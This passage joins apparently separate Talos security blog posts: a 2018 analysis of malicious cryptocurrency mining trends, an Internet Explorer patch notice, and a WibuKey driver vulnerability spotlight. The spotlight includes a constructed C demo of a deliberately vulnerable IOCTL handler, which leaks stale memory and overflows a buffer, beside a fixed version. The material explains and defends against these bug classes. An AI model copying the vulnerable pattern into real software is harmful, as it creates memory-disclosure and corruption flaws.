Likewise, "in-browser" mining such as CoinHive became popular, with many websites using scripts embedded on web pages that cause visitors to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to use their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email; now let's turn our focus to the more active measures that adversaries take through direct exploitation.

Active exploitation

One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. For at least a year, Cisco Talos observed adversaries discussing the potential for malicious cryptocurrency mining and then implementing those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining.

From Apache Struts to EternalBlue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning the malware can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value of the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this is where it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned.

For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog here.

Real-life impact

One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary sources of that data: the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation, by a significant margin. What's even more interesting is that it doesn't appear to be fading, at least not yet.

When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but that decrease has been confined to a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case. Instead, it's threats like RATs and Emotet that are dominating that particular landscape.
As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018.

Let's start by looking at network-based detections. In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look at actual mining activity rather than distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall level of mining activity remains largely static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.
The endpoint data held steady for the most part, but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including in the last month, when the price of cryptocurrencies truly cratered.

Cryptocurrency price crash

The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.

The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.

Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.
Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.
Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing.

Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.

Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments, such as ransomware operators, the collapse doesn't have much of an effect: they simply increase the amount of coin they request to account for the decreased value.

Future of mining

Now that all the data has been discussed, the real question remains: What does this mean for the future of mining?

The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly.

Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that.

Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to noisier threats like ransomware that require command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite the potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.

Conclusion

Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact — we've seen that it has had an impact on the volume of spam.

The data shows that this activity has been steady for the past six months, and although there is the potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access to compromised systems. This is probably the biggest reason why mining isn't going anywhere: it's profitable. And because it's easy, anyone looking to make money will be drawn to it.

The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continue to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server, a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or, when compromising an average computer in a developing country, a simple bot might be best to provide a foothold from which to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.

Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.

Microsoft Patches Out-of-Band Internet Explorer Scripting Engine Vulnerability After Exploitation Detected in the Wild


Overview

On December 19th, 2019 Microsoft released an out-of-band (OOB) patch related to a vulnerability in the scripting engine of Internet Explorer.  This particular vulnerability is believed to be actively exploited in the wild and should be patched immediately.

This remote code execution bug lies in the way that Internet Explorer's scripting engine handles objects in memory. Triggering this vulnerability can corrupt memory in such a way as to allow arbitrary code execution with the current user's rights. This vulnerability can be triggered in a variety of ways, including via a specially crafted web page that compromises a user who visits it. The full details of the vulnerability can be found here.

Coverage

In response to this vulnerability disclosure, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit it. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 48693-48698

Vulnerability Spotlight: Multiple Vulnerabilities in WIBU-SYSTEMS WibuKey.sys


These vulnerabilities were discovered by Marcin 'Icewall' Noga of Cisco Talos.

Executive Summary

WibuKey is a Digital Rights Management (DRM) solution that has been used in a large number of solutions such as Straton, Archicad, GRAPHISOFT, V-Ray and others. It has been leveraged by over 3,000 companies around the world to protect intellectual property and other digital content. Cisco Talos recently discovered multiple vulnerabilities in WibuKey that could be leveraged by an attacker to disclose potentially sensitive information, perform privilege escalation, or obtain arbitrary code execution on affected systems.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Wibu Systems to ensure that these issues are resolved and that a software update is available for affected customers. It is recommended that this update be applied as quickly as possible to ensure that systems are no longer affected by these vulnerabilities.

Vulnerability details

WIBU-SYSTEMS WibuKey.sys 0x8200E804 Kernel Memory Information Disclosure Vulnerability (TALOS-2018-0657 / CVE-2018-3989)

An exploitable kernel memory disclosure vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause the driver to return uninitialized memory, resulting in kernel memory disclosure. For additional details, please see the advisory here.

WIBU-SYSTEMS WibuKey.sys 0x8200E804 Pool Corruption Privilege Escalation Vulnerability (TALOS-2018-0658 / CVE-2018-3990)

An exploitable pool corruption vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause a buffer overflow, resulting in kernel memory corruption. For additional details, please see the advisory here.
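The two WibuKey.sys driver issues above (TALOS-2018-0657 and TALOS-2018-0658) are instances of two generic IOCTL-handler defect classes: copying a pool block to user mode before every byte of it has been written (kernel memory disclosure), and trusting the caller-supplied buffer length (pool corruption). The C program below is an added illustration of those two classes and of the checks that close them; it is not code from WibuKey.sys or from the Talos advisories, and it says nothing about what the real 0x8200E804 handler does. It simulates a pool page as a byte array pre-filled with a marker byte so that "stale" contents are deterministic, and the reply structure, block size, handler names and return codes (`ioctl_reply`, `ioctl_vulnerable`, `ioctl_fixed`, `IO_BAD_LENGTH`) are all constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed demonstration, not WibuKey.sys code.
 * Reply that a hypothetical IOCTL returns to user mode. The layout has no
 * padding, so sizeof(struct ioctl_reply) == 32 bytes. */
struct ioctl_reply {
    uint32_t status;
    uint32_t reserved;     /* the vulnerable handler never writes this field */
    uint8_t  detail[24];   /* filled from caller-supplied input */
};

#define BLOCK sizeof(struct ioctl_reply)
#define STALE 0x41         /* marker standing in for "what the previous owner left" */

/* Simulated pool page: two adjacent blocks. Block 0 is handed to our
 * handler; block 1 belongs to some other owner in the kernel. */
static union {
    struct ioctl_reply blocks[2];
    unsigned char bytes[2 * sizeof(struct ioctl_reply)];
} g_pool;

enum { IO_OK = 0, IO_BAD_LENGTH = -1 };   /* constructed return codes */

/* Make the "stale" pool contents deterministic for the demonstration. */
void reset_pool(void) { memset(g_pool.bytes, STALE, sizeof g_pool.bytes); }

/* Vulnerable pattern: the block is reused without zeroing, in_len is
 * trusted, and the block is copied out regardless of how much of it the
 * handler actually initialised. */
int ioctl_vulnerable(const unsigned char *in, size_t in_len,
                     unsigned char *out, size_t out_len)
{
    unsigned char *blk = g_pool.bytes;               /* "allocated" from the pool, not zeroed */
    uint32_t status = 0;
    memcpy(blk, &status, sizeof status);             /* only 'status' is written */
    memcpy(blk + offsetof(struct ioctl_reply, detail), in, in_len); /* unchecked: spills into block 1 */
    memcpy(out, blk, out_len);                       /* 'reserved' and unwritten 'detail' bytes leak */
    return IO_OK;
}

/* Hardened pattern: validate the IRP buffer lengths before touching memory,
 * then zero the block so no uninitialised byte can reach user mode. */
int ioctl_fixed(const unsigned char *in, size_t in_len,
                unsigned char *out, size_t out_len)
{
    struct ioctl_reply *r = &g_pool.blocks[0];
    if (in_len > sizeof r->detail || out_len < sizeof *r)
        return IO_BAD_LENGTH;                        /* reject before any write */
    memset(r, 0, sizeof *r);                         /* every byte defined */
    r->status = 0;
    memcpy(r->detail, in, in_len);
    memcpy(out, r, sizeof *r);                       /* copy exactly the initialised struct */
    return IO_OK;
}

/* 1 if the neighbouring block still holds only STALE bytes (untouched). */
int neighbour_intact(void)
{
    for (size_t i = BLOCK; i < 2 * BLOCK; i++)
        if (g_pool.bytes[i] != STALE) return 0;
    return 1;
}

/* Number of STALE marker bytes that reached the user-mode output buffer. */
size_t count_stale(const unsigned char *out, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (out[i] == STALE);
    return c;
}

int main(void)
{
    unsigned char in[40], out[BLOCK];
    memset(in, 0x5A, sizeof in);                     /* constructed caller input */

    reset_pool();
    ioctl_vulnerable(in, 4, out, sizeof out);
    printf("vulnerable: %zu stale kernel bytes disclosed\n", count_stale(out, sizeof out));
    reset_pool();
    ioctl_vulnerable(in, sizeof in, out, sizeof out);
    printf("vulnerable: neighbour block intact = %d\n", neighbour_intact());

    reset_pool();
    printf("fixed: oversized input -> %d\n", ioctl_fixed(in, sizeof in, out, sizeof out));
    ioctl_fixed(in, 4, out, sizeof out);
    printf("fixed: %zu stale bytes disclosed\n", count_stale(out, sizeof out));
    return 0;
}
```

With a 4-byte input, the vulnerable handler ships 24 marker bytes (the `reserved` field plus the unwritten tail of `detail`) to user mode; with a 40-byte input it overwrites 16 bytes of the neighbouring block. The hardened handler rejects both the oversized input and an undersized output buffer before writing anything, and its successful reply contains no stale bytes at all. The two rules it follows, check `InputBufferLength`/`OutputBufferLength` from the IRP before use and never copy out a structure that was not fully initialised, are the generic mitigations for the bug classes named in the advisories.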

WIBU-SYSTEMS WibuKey Network Server Management WkbProgramLow Remote Code Execution Vulnerability (TALOS-2018-0659 / CVE-2018-3991)

An especially critical exploitable heap overflow vulnerability exists in the WkbProgramLow function of WibuKey Network server management. A specially crafted TCP packet can cause a heap overflow and allow for remote kernel-level code execution. For additional details, please see the advisory here.

Versions tested

WIBU-SYSTEMS WibuKey Network server management 6.40.2402.500

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47729, 47750-47751
